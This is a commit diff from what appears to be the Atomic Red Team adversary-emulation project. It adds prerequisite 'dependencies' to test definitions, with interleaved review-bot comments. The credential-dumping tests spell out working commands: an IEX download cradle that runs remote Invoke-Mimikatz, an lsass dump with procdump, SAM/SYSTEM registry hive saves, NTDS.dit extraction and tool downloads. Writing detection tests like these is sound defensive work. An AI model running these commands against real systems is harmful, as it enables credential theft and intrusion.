Add Dependencies section to test Yaml and support to use them in the PS execution framework (#772)

* first draft at dependencies

* lowercase url
This commit is contained in:
Carrie Roberts
2020-01-09 07:36:08 -07:00
committed by Michael Haag
parent 550ba03c22
commit 511bb87af2
202 changed files with 5272 additions and 5691 deletions
+21 -13
@@ -19,15 +19,13 @@
case p
when 'macos'
'macOS'
when 'centos'
'CentOS'
else
p.capitalize
end
end.join(', ') %>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
@@ -37,24 +35,16 @@ end.join(', ') %>
<%- if test['executor']['name'] == 'manual' -%>
#### Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
<%= test['executor']['steps'] %>
<%- else -%>
#### Run it with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
#### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
```
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['prereq_command'] != nil -%>
#### Commands to Check Prerequisites:
```
<%= test['executor']['prereq_command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['cleanup_command'] != nil -%>
#### Cleanup Commands:
```
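Review bot: removing the `Commands to Check Prerequisites` block (the `prereq_command` rendering dropped in this hunk) means any atomic that still carries `executor.prereq_command` will have that check silently omitted from the generated README; this same commit keeps `prereq_command` under `executor` in the spec template and in the T1002 YAML, so either migrate those to `dependencies` here or keep rendering the old field until every atomic has moved over.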
@@ -62,5 +52,23 @@ end.join(', ') %>
```
<%- end -%>
<% if test['dependencies'].to_a.count > 0 %>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% test['dependencies'].each do | dep | -%>
##### Description: <%= dep['description'].strip! %>
##### Check Prereq Commands:
```
<%= dep['prereq_command'].strip! %>
```
##### Get Prereq Commands:
```
<%= dep['get_prereq_command'].strip! %>
```
<% end -%>
<% end -%>
<br/>
<%- end -%>
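Review bot: `strip!` returns `nil` when there is nothing to strip, so `<%= dep['description'].strip! %>`, `<%= dep['prereq_command'].strip! %>` and `<%= dep['get_prereq_command'].strip! %>` will render an empty string for any single-line value with no surrounding whitespace; use the non-mutating form the rest of this template already uses (`.to_s.strip`), which also stops the template from mutating the parsed YAML in place. Minor: `!= nil%>` on the dependency-executor line is missing the space before `%>`.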
+1 -1
@@ -84,7 +84,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'centos', 'ubuntu', 'macos', 'linux']
valid_supported_platforms = ['windows', 'macos', 'linux']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
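Review bot: narrowing `valid_supported_platforms` turns `centos` and `ubuntu` into hard validation failures for any atomic not updated in this commit; the raise message lists the accepted values so failures are self-explanatory, but the commit message should state that those two values are folded into `linux` so authors know what to change.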
+9 -4
@@ -10,8 +10,6 @@ atomic_tests:
supported_platforms:
- windows
- macos
- centos
- ubuntu
- linux
input_arguments:
@@ -20,11 +18,18 @@ atomic_tests:
type: todo
default: TODO
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
dependencies: # (optional)
- description: |
TODO
prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
TODO
executor:
name: command_prompt
elevation_required: true # indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false
prereq_command: | # for the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success. You can remove the prereq_command section if there are no pre-req's
TODO
command: | # these are the actaul attack commands, at least one command must be provided
TODO
cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
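Review bot: `executor.prereq_command` is kept in the template with its full explanation even though this commit stops rendering it in the README and moves the same semantics to `dependencies[].prereq_command`; mark the executor-level field as deprecated in its comment (or drop it from the template) so new atomics are not written against a field that no longer appears in the generated docs. Also `actaul` in the `command:` comment should be `actual`.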
+30 -5
@@ -13,8 +13,8 @@
# atomic_red_team/atomics
# atomic_red_team/atomics/T1234
# atomic_red_team/atomics/T1234/T1234.yaml <-- this is where all the atomic tests live
# atomic_red_team/atomics/T1234/payload1.sct <-- a payload file needed by one of the T1234 atomics
# atomic_red_team/atomics/T1234/payload2.dll <-- another payload file needed by one of the T1234 atomics
# atomic_red_team/atomics/T1234/src/payload1.sct <-- a payload file needed by one of the T1234 atomics (human readable)
# atomic_red_team/atomics/T1234/bin/payload2.dll <-- another payload file needed by one of the T1234 atomics (binary)
#
# In general, a set of atomic tests for a technique should never depend on payloads
# or supporting files from other atomic directories. We want to keep things nice and close.
@@ -74,7 +74,32 @@ atomic_tests:
type: Url
default: 0000:00:30
# a list of executors that can execute this atomic test. There are almost always going to be one of these
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
dependencies: # (optional)
# a list of dependies that must be met to successfully run this atomic
- description: |
TODO
prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
TODO
#example of two dependencies
dependencies:
- description: |
Sysmon executable must be available
prereq_command: |
where sysmon > nul
get_prereq_command: |
echo Automated installer not implemented yet, please install Sysmon manually
- description: |
Sysmon must be installed
prereq_command: |
sc query sysmon > nul
get_prereq_command: |
sysmon -i -accepteula
# a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
executors:
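Review bot: `dependencies:` now appears twice in the same mapping in this hunk (once with the TODO skeleton, once with the two-dependency Sysmon example), which a strict YAML parser rejects as a duplicate key; put the Sysmon example in a commented block or a separate test entry. Also `dependies` in the list comment should be `dependencies`.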
@@ -161,8 +186,8 @@ atomic_tests:
blah blah blah
supported_platforms:
- macos
- centos
- ubuntu
- linux
# in this example we have no input arguments
input_arguments:
executors:
+75 -29
@@ -23,23 +23,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | $env:USERPROFILE|
| output_file | Path where resulting compressed data should be placed | Path | $env:USERPROFILE\data.zip|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
#### Cleanup Commands:
```
Remove-Item -path #{output_file}
```
<br/>
<br/>
@@ -49,28 +53,44 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_path | Path that should be compressed into our output file | Path | %USERPROFILE%|
| file_extension | Extension of files to compress | String | .txt|
| output_file | Path where resulting compressed data should be placed | Path | %USERPROFILE%\data.rar|
| rar_installer | Winrar installer | Path | %TEMP%\winrar.exe|
| rar_exe | The RAR executable from Winrar | Path | %programfiles%/WinRAR/Rar.exe|
#### Run it with `command_prompt`!
```
rar a -r #{output_file} #{input_path} *#{file_extension}
```
#### Commands to Check Prerequisites:
#### Attack Commands: Run with `command_prompt`!
```
rar /?
"#{rar_exe}" a -r #{output_file} #{input_path} *#{file_extension}
```
#### Cleanup Commands:
```
del -f
del #{output_file}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Rar tool must be installed at specified location (#{rar_exe})
##### Check Prereq Commands:
```
if not exist "#{rar_exe}" (exit /b 1)
```
##### Get Prereq Commands:
```
echo Downloading Winrar installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
echo Follow the installer prompts to install Winrar
#{rar_installer}
```
<br/>
<br/>
@@ -80,27 +100,38 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_files | Path that should be compressed into our output file, may include wildcards | Path | $HOME/*.txt|
| output_file | Path that should be output as a zip archive | Path | $HOME/data.zip|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
zip #{output_file} #{input_files}
```
#### Commands to Check Prerequisites:
```
ls #{input_file}
```
#### Cleanup Commands:
```
rm -f
rm -f #{output_file}
```
#### Dependencies: Run with `sh`!
##### Description: Files to zip must exist (#{input_files})
##### Check Prereq Commands:
```
ls #{input_files}
```
##### Get Prereq Commands:
```
echo Please set input_files argument to include files that exist
```
<br/>
<br/>
@@ -110,23 +141,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed | Path | $HOME/victim-gzip.txt|
| input_content | contents of compressed files if file does not already exist. default contains test credit card and social security number | String | confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file})
```
#### Cleanup Commands:
```
rm -f #{input_file}.gz
```
<br/>
<br/>
@@ -136,25 +171,36 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file_folder | Path that should be compressed | Path | $HOME/$USERNAME|
| output_file | File that should be output | Path | $HOME/data.tar.gz|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
tar -cvzf #{output_file} #{input_file_folder}
```
#### Commands to Check Prerequisites:
```
test -e #{input_file_folder}
```
#### Cleanup Commands:
```
rm -f #{output_file}
```
#### Dependencies: Run with `sh`!
##### Description: Folder to zip must exist (#{input_file_folder})
##### Check Prereq Commands:
```
test -e #{input_file_folder}
```
##### Get Prereq Commands:
```
echo Please set input_file_folder argument to a folder that exists
```
<br/>
+44 -9
@@ -43,15 +43,33 @@ atomic_tests:
description: Path where resulting compressed data should be placed
type: Path
default: '%USERPROFILE%\data.rar'
rar_installer:
description: Winrar installer
type: Path
default: '%TEMP%\winrar.exe'
rar_exe:
description: The RAR executable from Winrar
type: Path
default: "%programfiles%/WinRAR/Rar.exe"
dependencies:
- description: |
Rar tool must be installed at specified location (#{rar_exe})
prereq_command: |
if not exist "#{rar_exe}" (exit /b 1)
get_prereq_command: |
echo Downloading Winrar installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
echo Follow the installer prompts to install Winrar
#{rar_installer}
executor:
name: command_prompt
elevation_required: false
prereq_command: |
rar /?
command: |
rar a -r #{output_file} #{input_path} *#{file_extension}
cleanup_command:
del -f #{output_file}
"#{rar_exe}" a -r #{output_file} #{input_path} *#{file_extension}
cleanup_command: |
del #{output_file}
- name: Data Compressed - nix - zip
description: |
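Review bot: the `get_prereq_command` for the RAR dependency downloads the WinRAR installer with `bitsadmin` and then executes it with no integrity check, whereas the WCE dependency added in this same commit verifies a SHA-256 (`wce_zip_hash`) before extracting; an equivalent `rar_installer_hash` input argument with the same check would keep the two consistent and avoid running an unverified download. The installer is also interactive ("Follow the installer prompts"), so an unattended run will block on this prerequisite; that is worth saying in the description.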
@@ -59,6 +77,7 @@ atomic_tests:
supported_platforms:
- linux
- macos
input_arguments:
input_files:
description: Path that should be compressed into our output file, may include wildcards
@@ -68,14 +87,23 @@ atomic_tests:
description: Path that should be output as a zip archive
type: Path
default: $HOME/data.zip
dependencies:
- description: |
Files to zip must exist (#{input_files})
prereq_command: |
ls #{input_files}
get_prereq_command: |
echo Please set input_files argument to include files that exist
executor:
name: sh
elevation_required: false
prereq_command: |
ls #{input_file}
ls #{input_files} > /dev/null
command: |
zip #{output_file} #{input_files}
cleanup_command:
cleanup_command: |
rm -f #{output_file}
- name: Data Compressed - nix - gzip Single File
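Review bot: `executor.prereq_command` (`ls #{input_files} > /dev/null`) now duplicates the new dependency check (`ls #{input_files}`) and is no longer rendered by the README template after this commit, so it can be dropped here; if both are kept, make them identical, since the dependency version without the redirect will echo the matched file list into the prerequisite output.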
@@ -116,11 +144,18 @@ atomic_tests:
description: File that should be output
type: Path
default: '$HOME/data.tar.gz'
dependencies:
- description: |
Folder to zip must exist (#{input_file_folder})
prereq_command: |
test -e #{input_file_folder}
get_prereq_command: |
echo Please set input_file_folder argument to a folder that exists
executor:
name: sh
elevation_required: false
prereq_command: |
test -e #{input_file_folder}
command: |
tar -cvzf #{output_file} #{input_file_folder}
cleanup_command: |
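Review bot: `test -e #{input_file_folder}` is present both as the dependency `prereq_command` and as `executor.prereq_command`; with the README no longer rendering the executor-level field, keep only the dependency form so there is a single place to maintain the check.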
+227 -38
@@ -165,60 +165,107 @@ The /proc filesystem on Linux contains a great deal of information regarding the
<br/>
## Atomic Test #1 - Powershell Mimikatz
Dumps Credentials via Powershell by invoking a remote mimikatz script
Dumps credentials from memory via Powershell by invoking a remote mimikatz script
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
<br/>
## Atomic Test #2 - Gsecdump
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
Dump credentials from memory using Gsecdump
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
gsecdump -a
#{gsecdump_exe} -a
```
#### Dependencies: Run with `powershell`!
##### Description: Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```
if (Test-Path #{gsecdump_exe}) {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Automated installer not implemented yet
```
<br/>
<br/>
## Atomic Test #3 - Windows Credential Editor
http://www.ampliasecurity.com/research/windows-credentials-editor/
Dump credentials from memory using Windows Credential Editor from https://www.ampliasecurity.com/research/windows-credentials-editor/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting data should be placed | Path | output.txt|
| output_file | Path where resulting data should be placed | Path | %temp%\output.txt|
| wce_exe | Path of Windows Credential Editor executable | Path | PathToAtomicsFolder\T1003\bin\wce.exe|
| wce_url | Path to download Windows Credential Editor zip file | URL | https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip|
| wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
wce -o #{output_file}
#{wce_exe} -o #{output_file}
```
#### Dependencies: Run with `powershell`!
##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
##### Check Prereq Commands:
```
if (Test-Path #{wce_exe}) {0} else {1}
```
##### Get Prereq Commands:
```
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
Remove-Item $zippath, $parentpath\wce -Recurse
}
```
<br/>
<br/>
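Review bot: two issues in this hunk. The Gsecdump dependency description reads `Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe})`, which looks copied from the WCE test; it should name Gsecdump, and since this README is generated the fix belongs in the T1003 YAML. Separately, `Invoke-WebRequestVerifyHash` in the WCE `Get Prereq Commands` block is not a built-in PowerShell cmdlet, so anyone pasting that block into a plain PowerShell session (which is what the README invites) gets a command-not-found error; state that it is provided by the execution framework, or inline a `Get-FileHash` comparison. Checking the download against `wce_zip_hash` before extraction is the right approach and the other downloads in this commit would benefit from the same check.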
@@ -241,7 +288,6 @@ reg save HKLM\system "#{output_folder}\system"
reg save HKLM\security "#{output_folder}\security"
```
#### Cleanup Commands:
```
rm "#{output_folder}\sam"
@@ -249,6 +295,10 @@ rm "#{output_folder}\system"
rm "#{output_folder}\security"
```
<br/>
<br/>
@@ -259,13 +309,13 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| procdump_binary_path | Path of the ProcDump binary | string | $PathToAtomicsFolder\T1003\bin\procdump64.exe|
| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
#{procdump_binary_path} -accepteula -ma lsass.exe #{output_file}
```
@@ -276,6 +326,23 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
rm "#{output_file}"
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```
if (Test-Path #{procdump_exe}) {0} else {1}
```
##### Get Prereq Commands:
```
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
```
<br/>
<br/>
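Review bot: the ProcDump dependency block references `#{procdump_exe}` four times, but the only input argument defined for this test is `procdump_binary_path`, so the placeholder will never be substituted and both the `Test-Path` check and the `Copy-Item` will operate on the literal string `#{procdump_exe}`; rename the references to `#{procdump_binary_path}`, or add a `procdump_exe` argument and use it in the attack command as well.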
@@ -286,8 +353,7 @@ Manager and administrative permissions.
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Task Manager:
#### Run it with these steps! 1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
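Review bot: `#### Run it with these steps! 1. Open Task Manager:` has the heading and the first step collapsed onto one line; this is consistent with the README template in this commit, where the `<%- end -%>` closing the elevation-required check on the heading line trims the newline before `<%= test['executor']['steps'] %>`. Use `<% end %>` there, or emit an explicit newline, so the steps start on their own line.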
@@ -302,6 +368,8 @@ Manager and administrative permissions.
<br/>
<br/>
@@ -312,7 +380,7 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| mimikatz_binary_path | Path of the Mimikatz binary | string | $PathToAtomicsFolder\T1003\bin\mimikatz.exe|
@@ -325,6 +393,8 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
<br/>
<br/>
@@ -336,18 +406,33 @@ subsequent domain controllers without the need of network-based replication.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:\Windows\Temp|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
<br/>
<br/>
@@ -357,18 +442,33 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
vssadmin.exe create shadow /for=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
<br/>
<br/>
@@ -382,13 +482,14 @@ This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | Path | C:\Windows\Temp|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
@@ -403,6 +504,38 @@ rm "#{extract_path}\VSC_SYSTEM_HIVE"
rm "#{extract_path}\SYSTEM_HIVE"
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
##### Description: Volume shadow copy must exist
##### Check Prereq Commands:
```
if not exist #{vsc_name} (exit /b 1)
```
##### Get Prereq Commands:
```
echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement
```
##### Description: Extract path must exist
##### Check Prereq Commands:
```
if not exist #{extract_path} (exit /b 1)
```
##### Get Prereq Commands:
```
mkdir #{extract_path}
```
<br/>
<br/>
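Review bot: `fulfuill` in the shadow-copy `Get Prereq Commands` echo should be `fulfill`. Otherwise the three independent checks here (domain controller, shadow copy present, extract path present), each with its own remediation message, are a good model for the other tests in this file.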
@@ -412,13 +545,28 @@ Look for the encrypted cpassword value within Group Policy Preference files on t
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
findstr /S cpassword %logonserver%\sysvol\*.xml
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Joining this computer to a domain must be done manually
```
<br/>
<br/>
@@ -428,12 +576,14 @@ Look for the encrypted cpassword value within Group Policy Preference files on t
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gpp_script_path | Path to the Get-GPPPassword PowerShell Script | Path | $PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1|
| gpp_script_path | Path to the Get-GPPPassword PowerShell Script | Path | PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1|
| gpp_script_url | URL of the Get-GPPPassword PowerShell Script | URL | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
. #{gpp_script_path}
Get-GPPPassword -Verbose
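Review bot: the `gpp_script_path` default changes from `$PathToAtomicsFolder\...` to `PathToAtomicsFolder\...` (no `$`), while `mimikatz_binary_path` and `procdump_binary_path` in this same file keep the `$PathToAtomicsFolder` form; pick one convention, since the executor can only substitute one of them and the other will be passed through as a literal path.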
@@ -441,6 +591,30 @@ Get-GPPPassword -Verbose
#### Dependencies: Run with `powershell`!
##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
##### Check Prereq Commands:
```
if(Test-Path "#{gpp_script_path}") { 0 } else { 1 }
```
##### Get Prereq Commands:
```
New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
```
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Joining this computer to a domain must be done manually
```
<br/>
<br/>
@@ -451,22 +625,21 @@ Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sam_binary_path | Path of the SAM file | string | C:\Windows\System32\config\sam|
| system_binary_path | Path of the SYSTEM file | string | C:\Windows\System32\config\system|
| security_binary_path | Path of the SECURITY file | string | C:\Windows\System32\config\security|
| ninjacopy_script_path | Path to the Invoke-NinjaCopy PowerShell script | Path | PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1|
| ninjacopy_script_url | URL of the Invoke-NinjaCopy PowerShell Script | URL | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/6b0ada999a9d2be8c6c9267da57b898494d13219/Exfiltration/Invoke-NinjaCopy.ps1|
| output_folder | Output folder path | Path | C:\Windows\Temp|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
. $PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam"
Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folder}\system"
Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security"
```
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
. #{ninjacopy_script_path}
Invoke-NinjaCopy -Path "%systemroot%\System32\sam" -LocalDestination "#{output_folder}\sam"
Invoke-NinjaCopy -Path "%systemroot%\System32\system" -LocalDestination "#{output_folder}\system"
Invoke-NinjaCopy -Path "%systemroot%\System32\security" -LocalDestination "#{output_folder}\security"
```
#### Cleanup Commands:
```
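Review bot: the new attack commands hard-code `%systemroot%\System32\sam` (and `system`, `security`), but this block runs under `powershell`, which does not expand `%systemroot%` (that is `cmd` syntax; PowerShell would need `$env:SystemRoot`), so `Invoke-NinjaCopy` is handed a literal path that does not exist. The new literals also drop the `config` directory that the old defaults had (`C:\Windows\System32\config\sam`). The previous version used the `sam_binary_path`, `system_binary_path` and `security_binary_path` inputs, which are still listed in the Inputs table but are now unused; either restore them in the commands or remove them from the table.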
@@ -475,4 +648,20 @@ rm "#{output_folder}\system"
rm "#{output_folder}\security"
```
#### Dependencies: Run with `powershell`!
##### Description: Invoke-NinjaCopy PowerShell Script must exist at #{ninjacopy_script_path}
##### Check Prereq Commands:
```
if(Test-Path "#{ninjacopy_script_path}") { 0 } else { 1 }
```
##### Get Prereq Commands:
```
New-Item -ItemType Directory (Split-Path "#{ninjacopy_script_path}") -Force | Out-Null
Invoke-WebRequest #{ninjacopy_script_url} -OutFile "#{ninjacopy_script_path}"
```
<br/>
+349 -246
@@ -3,296 +3,399 @@ attack_technique: T1003
display_name: Credential Dumping
atomic_tests:
- name: Powershell Mimikatz
description: |
Dumps Credentials via Powershell by invoking a remote mimikatz script
- name: Powershell Mimikatz
description: |
Dumps credentials from memory via Powershell by invoking a remote mimikatz script
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
name: powershell
elevation_required: true
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
supported_platforms:
- windows
- name: Gsecdump
description: |
Dump credentials from memory using Gsecdump
